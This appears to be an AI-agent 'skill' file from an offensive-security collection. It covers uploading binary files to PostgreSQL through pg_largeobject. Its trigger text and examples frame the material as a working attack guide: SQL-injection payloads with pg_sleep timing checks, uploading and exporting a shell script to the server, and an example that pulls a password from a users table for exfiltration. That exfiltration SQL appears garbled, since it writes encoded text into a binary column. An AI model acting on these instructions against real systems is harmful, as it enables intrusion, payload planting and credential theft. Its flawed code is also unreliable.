# PostgreSQL Large Object Upload

Upload binary files to PostgreSQL using large objects (`pg_largeobject`). Use this skill whenever you need to store files in PostgreSQL, exfiltrate data via SQL injection, upload malware payloads, or work with the `pg_largeobject` table and the `lo_creat`, `lo_import`, and `lo_export` functions. Trigger for any PostgreSQL file upload task, binary data storage, or SQL injection scenario requiring file operations.

```shell
git clone https://github.com/abelrguezr/hacktricks-skills
```

Skill path: `skills/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql/SKILL.md`

This skill helps you upload binary files to PostgreSQL using the `pg_largeobject` table, which stores data in 2KB chunks. This is essential for SQL injection exploitation, data exfiltration, and file storage in PostgreSQL databases.
## When to Use This Skill

- Uploading files to PostgreSQL via SQL injection
- Storing binary data (images, PDFs, executables) in PostgreSQL
- Exfiltrating data through SQL injection vulnerabilities
- Working with `pg_largeobject`, `lo_creat`, `lo_import`, `lo_export`
- Creating reverse shells or payloads in PostgreSQL
## Core Concepts

### Large Object Structure

PostgreSQL large objects store data in the `pg_largeobject` table with this structure:

- `loid`: Large Object ID (unique identifier)
- `pageno`: Page number (0-indexed, each page = 2KB)
- `data`: Binary data chunk (exactly 2KB except possibly the last chunk)
### Why 2KB Chunks?

The `lo_export()` function requires chunks to be exactly 2KB (2048 bytes) for proper reconstruction. The last chunk can be smaller.
## Workflow

### Step 1: Prepare Your File

Split your binary file into 2KB chunks:

```shell
# Use the bundled script
python scripts/chunk_file.py <input_file> <output_dir>

# Or manually
split -b 2048 your_file.txt chunks_
```
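For reference, the chunking step can be sketched in pure Python (a hypothetical stand-in for `chunk_file.py`; the bundled script's output naming may differ):

```python
import math
from pathlib import Path

CHUNK_SIZE = 2048  # pg_largeobject page size


def chunk_file(input_file: str, output_dir: str) -> list[Path]:
    """Split input_file into 2KB chunks named chunk_0000, chunk_0001, ..."""
    data = Path(input_file).read_bytes()
    out = Path(output_dir)
    out.mkdir(parents=True, exist_ok=True)
    paths = []
    for pageno in range(math.ceil(len(data) / CHUNK_SIZE)):
        chunk = data[pageno * CHUNK_SIZE:(pageno + 1) * CHUNK_SIZE]
        path = out / f"chunk_{pageno:04d}"
        path.write_bytes(chunk)
        paths.append(path)
    return paths
```

Only the last chunk may be shorter than 2048 bytes, matching the `lo_export()` requirement above.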
### Step 2: Encode Chunks

Encode each chunk to Base64 or Hex for SQL insertion:

```shell
# Base64 (recommended - more compact)
python scripts/encode_chunks.py --format base64 chunks_*

# Hex (useful for certain injection contexts)
python scripts/encode_chunks.py --format hex chunks_*
```

Encoding size considerations:

- Base64: `ceil(n / 3) * 4` bytes (e.g., 2KB → ~2.7KB)
- Hex: `n * 2` bytes (e.g., 2KB → 4KB)
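These size formulas can be sanity-checked against Python's own encoders (a standalone sketch, not one of the bundled scripts):

```python
import base64
import binascii
import math


def base64_size(n: int) -> int:
    """Base64 output size (including '=' padding) for n input bytes."""
    return math.ceil(n / 3) * 4


def hex_size(n: int) -> int:
    """Hex output size for n input bytes."""
    return n * 2


chunk = bytes(2048)  # one full 2KB page
assert len(base64.b64encode(chunk)) == base64_size(2048)   # 2732 bytes
assert len(binascii.hexlify(chunk)) == hex_size(2048)      # 4096 bytes
```

In injection contexts where payload length matters, the ~33% Base64 overhead versus 100% for Hex is why Base64 is recommended.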
### Step 3: Create Large Object

Choose your method based on your access level:

#### Method A: `lo_creat` (Standard)

```sql
-- Create a new large object (auto-generated LOID)
SELECT lo_creat(-1);
-- Note: returns the LOID you'll need for subsequent operations
```

#### Method B: `lo_create` (Fixed LOID, for Blind SQLi)

```sql
-- Create with a specific LOID (useful for blind SQL injection)
SELECT lo_create(173454);
```

Why a fixed LOID? In blind SQL injection you can't see the returned LOID; using a fixed value lets you reference it in subsequent queries.
### Step 4: Insert Data Chunks

#### Using Base64 (Recommended)

```sql
INSERT INTO pg_largeobject (loid, pageno, data)
VALUES (173454, 0, decode('<base64_chunk_1>', 'base64'));
INSERT INTO pg_largeobject (loid, pageno, data)
VALUES (173454, 1, decode('<base64_chunk_2>', 'base64'));
-- Continue for all chunks...
```

#### Using Hex

```sql
INSERT INTO pg_largeobject (loid, pageno, data)
VALUES (173454, 0, decode('<hex_chunk_1>', 'hex'));

-- Or update existing pages
UPDATE pg_largeobject
SET data = decode('<hex_chunk_1>', 'hex')
WHERE loid = 173454 AND pageno = 0;
```
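Writing these statements by hand is tedious; a minimal sketch of an INSERT generator follows (hypothetical — the bundled `generate_sql.py` may format its output differently):

```python
import base64


def generate_inserts(data: bytes, loid: int, chunk_size: int = 2048) -> list[str]:
    """Emit one INSERT per 2KB page, Base64-encoding each chunk for SQL transport."""
    statements = []
    for offset in range(0, len(data), chunk_size):
        b64 = base64.b64encode(data[offset:offset + chunk_size]).decode()
        statements.append(
            "INSERT INTO pg_largeobject (loid, pageno, data) "
            f"VALUES ({loid}, {offset // chunk_size}, decode('{b64}', 'base64'));"
        )
    return statements
```

Each statement targets a consecutive `pageno` starting at 0, which is what `lo_export()` expects when it reassembles the object.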
### Step 5: Export to Filesystem

```sql
-- Export the large object to a file
SELECT lo_export(173454, '/tmp/your_file');

-- Clean up (optional but recommended)
SELECT lo_unlink(173454);
```
### Alternative: `lo_import` Method

If you have filesystem access on the database server:

```sql
-- Import file directly (creates LOID automatically)
SELECT lo_import('/path/to/file');

-- Import with specific LOID
SELECT lo_import('/path/to/file', 173454);
```

Note: the server-side `lo_import` reads the file with the permissions of the database server process, so the server (not your client) must be able to read the path; by default its use is restricted to superusers.
## SQL Injection Scenarios

### Blind SQL Injection

When you can't see query results:

- Use a fixed LOID (e.g., 173454)
- Insert chunks one at a time
- Use time-based or boolean-based checks to verify success
- Export once all chunks are inserted

Example time-based check:

```sql
-- If the large object has at least one page, wait 5 seconds
SELECT CASE
    WHEN (SELECT count(*) FROM pg_largeobject WHERE loid = 173454) > 0
    THEN pg_sleep(5)
    ELSE NULL
END;
```
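When driving the injection point from a script, the timing oracle can be wrapped like this (a sketch; `execute_sql` is a placeholder for however you deliver queries to the target):

```python
import time
from typing import Callable


def loid_exists(execute_sql: Callable[[str], None], loid: int,
                delay: float = 5.0) -> bool:
    """Time-based check: the payload sleeps `delay` seconds iff the LOID has pages."""
    payload = (
        "SELECT CASE WHEN (SELECT count(*) FROM pg_largeobject "
        f"WHERE loid={loid}) > 0 THEN pg_sleep({delay}) ELSE NULL END;"
    )
    start = time.monotonic()
    execute_sql(payload)  # deliver through your injection point
    return time.monotonic() - start >= delay
```

Pick a `delay` comfortably above the target's normal response jitter, and repeat the check a few times before trusting a negative result.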
### Error-Based SQL Injection

Use errors to confirm operations:

```sql
-- Triggers an error if the LOID doesn't exist
SELECT lo_export(173454, '/tmp/test');
```
## Debugging

### View Large Object Contents

```sql
-- See all chunks (escape encoding for readability)
SELECT loid, pageno, encode(data, 'escape')
FROM pg_largeobject
WHERE loid = 173454
ORDER BY pageno;

-- Count chunks
SELECT loid, count(*) AS chunk_count
FROM pg_largeobject
WHERE loid = 173454
GROUP BY loid;

-- Check total size
SELECT loid, count(*) * 2048 AS approx_size_bytes
FROM pg_largeobject
WHERE loid = 173454
GROUP BY loid;
```

### List All Large Objects

```sql
SELECT DISTINCT loid FROM pg_largeobject;
```
## Limitations & Considerations

### Access Control Lists (ACLs)

Large objects may have ACLs restricting access:

- You may not be able to access objects you didn't create
- Older objects might have permissive ACLs (useful for exfiltration)
- Check permissions: `SELECT * FROM pg_largeobject_metadata WHERE oid = <oid>;`
### Required Privileges

- `lo_creat` / `lo_create`: Requires `CREATE` privilege on the database
- `lo_export`: Requires `EXECUTE` privilege on `lo_export`
- `lo_import`: Requires `EXECUTE` privilege on `lo_import`
- `lo_unlink`: Requires ownership or `DELETE` privilege
### Size Limits

- PostgreSQL large objects can store up to 4TB per object (2GB before PostgreSQL 9.3)
- Each chunk must be exactly 2KB (except the last)
- Total chunks = `ceil(file_size / 2048)`
## Quick Reference

| Operation | SQL Command | Notes |
|---|---|---|
| Create LO | `SELECT lo_creat(-1);` | Auto-generates LOID |
| Create LO (fixed) | `SELECT lo_create(173454);` | Use for blind SQLi |
| Insert chunk | `INSERT INTO pg_largeobject (loid, pageno, data) VALUES (...);` | 2KB chunks |
| Export | `SELECT lo_export(173454, '/tmp/file');` | Write to filesystem |
| Delete | `SELECT lo_unlink(173454);` | Clean up |
| View chunks | `SELECT * FROM pg_largeobject WHERE loid = 173454;` | Debug |
## Scripts

Use the bundled scripts to automate the workflow:

- `scripts/chunk_file.py`: Split files into 2KB chunks
- `scripts/encode_chunks.py`: Encode chunks to Base64 or Hex
- `scripts/generate_sql.py`: Generate SQL INSERT statements

Run `python scripts/<script>.py --help` for usage details.
## Examples

### Upload a Shell Script

```shell
# 1. Chunk the file
python scripts/chunk_file.py /tmp/shell.sh /tmp/chunks/

# 2. Encode to Base64
python scripts/encode_chunks.py --format base64 /tmp/chunks/*

# 3. Generate SQL
python scripts/generate_sql.py --loid 173454 --format base64 /tmp/chunks/*

# 4. Execute the generated SQL through your injection point
# 5. Export: SELECT lo_export(173454, '/tmp/shell.sh');
```
Exfiltrate Database Contents
-- 1. Create large object SELECT lo_create(173455); -- 2. Insert data from sensitive table INSERT INTO pg_largeobject (loid, pageno, data) SELECT 173455, 0, encode((SELECT password FROM users LIMIT 1), 'base64'); -- 3. Export SELECT lo_export(173455, '/tmp/extracted.txt');
## Troubleshooting

- **"Large object does not exist"**: The LOID doesn't exist or was already deleted. Create a new one.
- **"Permission denied"**: Check your privileges on `lo_export` and write access to the target directory.
- **"Chunk size mismatch"**: Ensure all chunks except the last are exactly 2KB.
- **File corrupted after export**: Verify chunk sizes and that all chunks were inserted in order, with consecutive `pageno` values starting at 0.
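Before blaming the export, you can verify locally that your chunks reassemble the original file (a sketch assuming chunks as produced in Step 1):

```python
import hashlib

CHUNK_SIZE = 2048  # pg_largeobject page size


def verify_chunks(original: bytes, chunks: list[bytes]) -> bool:
    """Check that every non-final chunk is exactly 2KB, then compare
    the in-order reassembly against the original file's hash."""
    for i, chunk in enumerate(chunks[:-1]):
        if len(chunk) != CHUNK_SIZE:
            raise ValueError(f"chunk {i} is {len(chunk)} bytes, expected {CHUNK_SIZE}")
    reassembled = b"".join(chunks)
    return hashlib.sha256(reassembled).digest() == hashlib.sha256(original).digest()
```

If this passes locally but the exported file is still corrupt, suspect the server-side insertion order or a missing page rather than the chunking itself.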